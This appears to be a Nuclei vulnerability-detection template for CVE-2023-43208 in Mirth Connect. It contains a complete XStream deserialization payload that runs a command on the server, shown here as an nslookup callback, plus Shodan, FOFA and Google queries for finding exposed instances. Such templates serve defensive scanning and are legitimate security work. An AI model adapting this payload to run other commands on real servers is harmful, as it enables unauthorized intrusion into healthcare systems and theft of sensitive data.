112 lines
4.4 KiB
YAML
112 lines
4.4 KiB
YAML
id: CVE-2023-43208
|
|
|
|
info:
|
|
name: NextGen Healthcare Mirth Connect - Remote Code Execution
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Unauthenticated remote code execution vulnerability in NextGen Healthcare Mirth Connect before version 4.4.1.
|
|
impact: |
|
|
Successful exploitation could result in unauthorized access and potential compromise of sensitive data.
|
|
remediation: |
|
|
Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html
|
|
- https://github.com/nvn1729/advisories
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-43208
|
|
epss-score: 0.96306
|
|
epss-percentile: 0.99539
|
|
cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: nextgen
|
|
product: "mirth_connect"
|
|
shodan-query:
|
|
- "title:\"mirth connect administrator\""
|
|
- http.title:"mirth connect administrator"
|
|
fofa-query: "title=\"mirth connect administrator\""
|
|
google-query: "intitle:\"mirth connect administrator\""
|
|
tags: packetstorm,cve,cve2023,nextgen,rce,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /api/server/version HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: OpenAPI
|
|
- |
|
|
POST /api/users HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Requested-With: OpenAPI
|
|
Content-Type: application/xml
|
|
|
|
<sorted-set>
|
|
<string>abcd</string>
|
|
<dynamic-proxy>
|
|
<interface>java.lang.Comparable</interface>
|
|
<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
|
|
<target class="org.apache.commons.collections4.functors.ChainedTransformer">
|
|
<iTransformers>
|
|
<org.apache.commons.collections4.functors.ConstantTransformer>
|
|
<iConstant class="java-class">java.lang.Runtime</iConstant>
|
|
</org.apache.commons.collections4.functors.ConstantTransformer>
|
|
<org.apache.commons.collections4.functors.InvokerTransformer>
|
|
<iMethodName>getMethod</iMethodName>
|
|
<iParamTypes>
|
|
<java-class>java.lang.String</java-class>
|
|
<java-class>[Ljava.lang.Class;</java-class>
|
|
</iParamTypes>
|
|
<iArgs>
|
|
<string>getRuntime</string>
|
|
<java-class-array/>
|
|
</iArgs>
|
|
</org.apache.commons.collections4.functors.InvokerTransformer>
|
|
<org.apache.commons.collections4.functors.InvokerTransformer>
|
|
<iMethodName>invoke</iMethodName>
|
|
<iParamTypes>
|
|
<java-class>java.lang.Object</java-class>
|
|
<java-class>[Ljava.lang.Object;</java-class>
|
|
</iParamTypes>
|
|
<iArgs>
|
|
<null/>
|
|
<object-array/>
|
|
</iArgs>
|
|
</org.apache.commons.collections4.functors.InvokerTransformer>
|
|
<org.apache.commons.collections4.functors.InvokerTransformer>
|
|
<iMethodName>exec</iMethodName>
|
|
<iParamTypes>
|
|
<java-class>java.lang.String</java-class>
|
|
</iParamTypes>
|
|
<iArgs>
|
|
<string>nslookup {{interactsh-url}}</string>
|
|
</iArgs>
|
|
</org.apache.commons.collections4.functors.InvokerTransformer>
|
|
</iTransformers>
|
|
</target>
|
|
<methodName>transform</methodName>
|
|
<eventTypes>
|
|
<string>compareTo</string>
|
|
</eventTypes>
|
|
</handler>
|
|
</dynamic-proxy>
|
|
</sorted-set>
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'compare_versions(version, "<4.4.1")'
|
|
- 'contains(interactsh_protocol, "dns")'
|
|
- 'status_code_1 == 200 && status_code_2 == 500'
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body_1
|
|
name: version
|
|
group: 1
|
|
regex:
|
|
- '(.*)'
|
|
internal: true
|
|
# digest: 4a0a004730450220493bb6fcbb5b0e17a203c29515fb7d3e84813d5da8775cddf045269de8a6f97f02210084f1354002a9be79b69f4f76c3cba09bdc1c9110d7e8d0e99db5d1dbf1a37299:922c64590222798bb761d5b6d8e72950 |